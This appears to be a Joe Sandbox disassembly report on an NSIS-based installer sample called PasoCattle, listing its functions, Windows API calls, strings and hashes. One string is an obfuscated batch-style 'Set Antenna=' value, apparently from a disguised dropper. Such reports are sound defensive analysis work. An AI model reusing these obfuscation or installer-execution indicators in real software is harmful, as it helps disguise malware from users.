Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

@jG, xrefs: 00405AF2
RichEd32, xrefs: 00405BD4
F, xrefs: 00405A22
.DEFAULT\Control Panel\International, xrefs: 004059C5
_Nb, xrefs: 00405AFD
"F, xrefs: 00405A4B
.exe, xrefs: 00405A69
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEdit, xrefs: 00405BF0
RichEd20, xrefs: 00405BC9

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user abort, xrefs: 00401B53
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
soft, xrefs: 004036A1
Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
API String ID: 651206458-1427982325
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
open, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
open, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
